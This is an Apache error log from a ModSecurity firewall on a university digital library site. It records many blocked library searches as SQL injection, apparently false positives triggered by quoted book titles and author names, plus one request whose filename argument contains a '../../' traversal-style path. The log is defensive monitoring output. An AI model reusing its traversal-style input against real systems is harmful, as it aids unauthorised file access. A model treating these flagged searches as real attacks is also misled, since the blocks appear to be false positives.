[Mon Aug 28 22:26:44.756675 2023] [:error] [pid 53584] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22DASAR-DASAR PERUNDANG-UNDANGAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy8tMCo-f0AANFQ0dkAAAAH"]
[Mon Aug 28 22:42:30.973947 2023] [:error] [pid 53628] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BISNIS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzAZsCo-f0AANF8agEAAAAV"]
[Mon Aug 28 23:12:06.395886 2023] [:error] [pid 54392] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Achmad Ichsan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzHVsCo-f0AANR4BmwAAAAI"]
[Mon Aug 28 23:16:19.208019 2023] [:error] [pid 54436] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PSIKOLOGI PENDIDIKAN MUTAKHIR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzIU8Co-f0AANSkVT0AAAAI"]
[Mon Aug 28 23:24:45.981209 2023] [:error] [pid 55012] [client 66.249.70.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ARSITEKTUR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzKTcCo-f0AANbkqGoAAAAP"]
[Mon Aug 28 23:28:59.485529 2023] [:error] [pid 55183] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ISMAWAN, INDRA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzLS8Co-f0AANePQLUAAAAC"]
[Mon Aug 28 23:30:35.457382 2023] [:error] [pid 55189] [client 114.124.161.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/Buku-900-111.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOzLq8Co-f0AANeV5ZgAAAAB"]
[Tue Aug 29 00:35:10.401547 2023] [:error] [pid 56653] [client 52.167.144.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22JACOB BALLENGER, JOHN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzazsCo-f0AAN1NyIIAAAAW"]
[Tue Aug 29 00:47:23.593542 2023] [:error] [pid 56816] [client 47.128.24.154] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SWASTHA, BASU\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzdq8Co-f0AAN3w@hsAAAAF"]
[Tue Aug 29 00:56:12.233254 2023] [:error] [pid 56920] [client 47.128.19.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:+BISNIS+IKAN+NILA". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:+BISNIS+IKAN+NILA\\x22:  BISNIS IKAN NILA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzfvMCo-f0AAN5YQdsAAAAR"]
[Tue Aug 29 01:57:35.767204 2023] [:error] [pid 57552] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BISNIS IKAN KONSUMSI DI LAHAN SEMPIT\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzuH8Co-f0AAODQhzMAAAAM"]
[Tue Aug 29 02:01:46.511948 2023] [:error] [pid 57542] [client 40.77.167.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SANTOSO, PUDJI.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzvGsCo-f0AAODGDHAAAAAH"]
[Tue Aug 29 02:33:54.092821 2023] [:error] [pid 57729] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BUDAYA NUSANTAA 33 PROVINSI   ATLAS PROVINSI INDON\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz2osCo-f0AAOGBMwcAAAAc"]
[Tue Aug 29 02:39:28.297500 2023] [:error] [pid 57847] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PEDOMAN HUBUNGAN INDUSTRIAL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz38MCo-f0AAOH34QsAAAAB"]
[Tue Aug 29 02:46:50.951162 2023] [:error] [pid 57729] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22NILA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz5qsCo-f0AAOGBMxsAAAAc"]
[Tue Aug 29 02:58:49.261178 2023] [:error] [pid 58002] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22AL- QUR'AN & HAK HAK ASASI MANUSIA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz8ecCo-f0AAOKS0TsAAAAC"]
[Tue Aug 29 03:02:56.207866 2023] [:error] [pid 58298] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22EKONOMI TEKNIK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz9cMCo-f0AAOO68rQAAAAA"]
[Tue Aug 29 03:07:09.232411 2023] [:error] [pid 58261] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22TEORI DAN KAPITA SELEKTA SOSIOLOGI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz@bcCo-f0AAOOVuRkAAAAB"]
[Tue Aug 29 03:07:18.718517 2023] [:error] [pid 58038] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22BAGIO, TONY HARTONO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz@dsCo-f0AAOK2vBAAAAAI"]
[Tue Aug 29 03:08:56.195582 2023] [:error] [pid 58301] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MESJID DALAM KARYA ARSITEKTUR NASIONAL INDONESIA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz@2MCo-f0AAOO9lkcAAAAO"]
[Tue Aug 29 03:08:57.887620 2023] [:error] [pid 58339] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MANAJEMEN PORTOFOLIO DAN INVESTASI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz@2cCo-f0AAOPj81MAAAAP"]
[Tue Aug 29 03:17:00.019269 2023] [:error] [pid 58219] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KITAB UU HUKUM PIDANA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0AvMCo-f0AAONrh6QAAAAH"]
[Tue Aug 29 03:25:27.539226 2023] [:error] [pid 58445] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SUANDI, I NENGAH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0Ct8Co-f0AAORNcvUAAAAB"]
[Tue Aug 29 03:25:32.182765 2023] [:error] [pid 58495] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22SEKOLAH DASAR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0CvMCo-f0AAOR-PFAAAAAF"]
[Tue Aug 29 03:25:35.010403 2023] [:error] [pid 58492] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KESEHATAN WANITA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0Cv8Co-f0AAOR8VekAAAAS"]
[Tue Aug 29 03:30:39.032508 2023] [:error] [pid 58546] [client 40.77.167.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22UU DESA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0D78Co-f0AAOSyvzwAAAAa"]
[Tue Aug 29 03:31:44.979963 2023] [:error] [pid 58590] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Suryana Herman\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0EMMCo-f0AAOTe2-MAAAAR"]
[Tue Aug 29 04:35:48.465730 2023] [:error] [pid 59080] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Bambang Waluyo\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0TNMCo-f0AAObIqSoAAAAR"]
